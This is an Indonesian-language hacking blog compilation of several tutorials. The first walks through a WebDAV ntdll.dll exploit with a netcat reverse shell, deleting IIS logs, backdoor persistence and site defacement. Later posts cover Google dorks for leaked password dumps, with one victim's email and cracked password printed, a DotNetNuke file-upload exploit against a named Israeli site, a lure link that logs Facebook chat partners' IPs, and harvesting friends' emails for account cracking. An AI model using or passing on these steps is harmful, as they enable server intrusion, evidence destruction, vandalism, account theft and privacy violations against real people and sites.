Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan  exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.
D:\vcproject\webdave\debug>web.exe
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
syntax: D:\WEB.EXE <host_target> <host_anda> <port_anda> [padding]
Cool !!!  Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:
D:\vcproject\webdave\debug>web.exe  123.123.123.123  200.200.200.200  6666
Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
connect to 200.200.200.200 from 123.123.123.123
Microsoft(R) Windows 2000
(C)Copyright Microsoft Corp 1981-2000.
C:\winnt\system32>
Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.
4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?
Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.
C:\winnt\system32> rmdir /s /q logfiles
Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.
Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.
Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah  C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:
C:\inetpub\wwwroot> copy index.html indexold.html
C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:
C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:
C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.
5) Kesimpulan
Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.

Semoga bermanfaat

Hacking Email – Hotmail Yahoo Gmail

Assalamualaikum Wr,wB
hai guys ,lebay ah udah kayak selena gomez aja kali ini saya admin paling tampan sejagad raya,…..
mau post tentang hack email - hotmail , yahoo, gnail
Berikut POC + PICT nya jadi gak ada yang protes minta POC sama PICT
Btw langsung saja ke TKP :
Hari ini ane akan menunjukkan kepada Anda cara hack account email menggunakan beberapa Dorks google khusus, ingat google adalah teman kita.
Persyaratan:
Google Dorks:
ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@hotmail.com intextpassword
Quote:ext:sql intext:@hotmail.com intextpassword
Quote:ext:sql intext:@hotmail.com
Online Hash Cracker:
http://md5crack.com/
Ok mari kita mulai:
Mari kita pergi ke http://www.google.com dan copy paste kan dork yang ane share,…..dan cari salah satu situs di sana buat korban
Hack Email Hotmail
Pilih salah satu halaman ditampilkan, seperti yang Anda lihat sekarang kita memiliki banyak account email + hash
Hack Gmail - Hacking Email
Saya memilih account acak
zhaokailun92@yahoo.com.cn
d2491b289b6be1fd0bb0c8d60 e053d3d
Kita buka MD5 Cracker Hash, Bisa Disini: http://md5crack.com , atau anda bisa cari di google tools untuk Crack MD5 password, banyak bertebaran.
Kemudian masukkan hashnya ke tools MD5 online Cracker, jadi seperti gambar berikut:
Hacking Yahoo EMail
Seperti yang Anda lihat kita dapat menghack account yang kita tuju
Email: zhaokailun92 @ yahoo. com.cn
Password: 19920707
Ets, bersenang-senang dan menikmati akun tak terbatas ,…btw jgn hack email ane yahh cuma numpang share aja kok ,…
Tutor nya jga baru ane pelajari jadi jika ada yang salah maafin yoo..
Maklum Setampan tampannya saya ada salah nya juga
Semoga bermanfaat

sumber : Binus Hacker

Hacking Website Melalui Handphone

AssalamualaikumWr,Wb
Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Admin Tampan  yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.

Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!
Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.
Bahan2 yg kita butuhkan adalah:

1. Operamini browser versi 5.0
2. Operamini browser versi 4.2
Kenapa pake 2 Web Browser ?
Lebih enak pake 2 browser di atas.alasannya adalah:
1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.
2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.
3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0
Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)
Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.
Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->
inurl:”/portals/0″  
And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:
http://securityreason.com/exploitalert/6234
Next, misalkan kita dah dpt targetnya nih…
Example site:
http://fril.co.il/portals/0/cwindex.txt
Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
->http://site.com/[path]/portals/0/a.txt
Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.
Setelah dapet dan pasti vuln seperti site di bawah ini.
http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!
Setelah site target di buka di opmin 4.2
Pilih : file ( select a file on your site)
Tunggu biar loading selesai dan menampilkan 2 kolom:
Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)
Lalu klik ok….
Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.
Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone
Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
Semoga Bermanfaat

Cara Mengetahui IP Lawan via Chatting Facebook

Assalamualaikum Wr,Wb

Silakan disimak tutorial ini, untuk mengetahui IP publik teman chatting anda :)
Kalau ada pertanyaangabung langsung ke group binushacker disini: https://www.facebook.com/groups/scandinavians/
Tutorial ini digunakan untuk mengetahui IP lawan dengan cara chat di FaceBook.
Hal ini bermanfaat untuk mengidentifikasi lawan melalui media Social Engineering.
Cara Mengetahui IP Lawan
Ada beberapa yang perlu disiapkan yaitu:
  1. Sebuah SERVER HOSTING yang bisa dipakai untuk menyimpan file logger.
  2. Sebuah LINK content / halaman menarik yang dapat digunakan untuk mengalihkan perhatian lawan.
  3. FILE LOGGER itu sendiri.
Instalasi FILE LOGGER kedalam CONTENT:

  1. Bikin sebuah artikel yang indah & menarik, sehingga akan banyak orang yang akan melihat.
  2. Kemudian buatlah file HTML, misalkan simpan difile: “galau.html“.
  3. Pada sela-sela code html tersebut, masukkanlah / inject code logger kedalam source htmlnya.
  4. Sesuaikan / edit alamat email untuk pengiriman hasil IP target di dalam code loggernya.
  5.  Kemudian upload file tersebut ke server hosting.
  6. Pastikan serverhosting memiliki kemampuan  pengiriman email seperti: SMTP / POP3
  7. Nanti file tersebut dibuka dengan: http://www.situsanda.com/galau.html
Cara yang dipakai disini adalah:
  1. Berusaha chatting dengan lembut dan baik dengan lawan chatting kita.
  2. Kemudian rayulah lawan untuk dapat meng-klik LINK yang sudah kita berikan tadi.
  3. Konfirmasikan ke lawan apakah sudah membaca link dengan cara menanyakan apa isi linknya.
  4. Link yang anda kirimkan adalah link logger yang tadi yaitu http://www.situsanda.com/galau.html
Setelah dapat dipastikan bahwa lawan kita sudah melihat link tersebut.
Maka, jreeengggggg.. kita lihat hasilnya. Itulah dia IP lawan chatting kita di Facebook.
Untul lebih jelas detailnya silakan ditonton disini:
File yang dibutuhkan, silakan download disini:


Selamat mencoba & semoga berhasil

Cara Melihat Email Facebook Teman



Assalamualaikum Wr,Wb

Hack Email Facebook Teman
Kali ini berbagi mengenai cara melihat email teman di facebook yang kemudian bisa digunakan untuk hacking password facebook, hal ini bisa dilakukan melalui informasi email tersebut, download facebook account hacking melalui informasi email, facebook password cracker by family dengan email & merupakan salah satu facebook hacking tips and tricks 2013 untuk mencuri informasi email.
Sesuai judul diatas saya akan membagikan ke agan-agan cara melihat Email Teman facebook agan (berguna bagi socenger socenger jahil,hihihihihi :P )
Firstly/pertama, login ke Akun yahoo yang agan gunakan login ke facebook
AnonK7_1
Nah, udah masuk ke akun yahoo lanjut ke tab “kontak”, klik Import Kontak
AnonK7_2
Karena kita akan melihat email teman facebook, maka kta pilih/klik facebook nanti akan ada layar pop up yang muncul, klik ya/yes
AnonK7_3
Tunggu proses import yang di lakukan oleh yahoo
AnonK7_4
Setelah proses impor selesai klik back to contact /selesai
AnonK7_5
Jika agan masih ingin melihat emailnya, klik tindakan -> cetak semua
AnonK7_6
Lalu klik,tampilan untuk cetak
AnonK7_7
Taraaaa….beratus ratus email muncul di tab baru
hehehehe :)
*NB : segala tindakan selanjutnya yang di ambil oleh pembaca bukan tanggung jawab penulis,karena penulis cuma berbagi trik.


sumber : Binus Hacker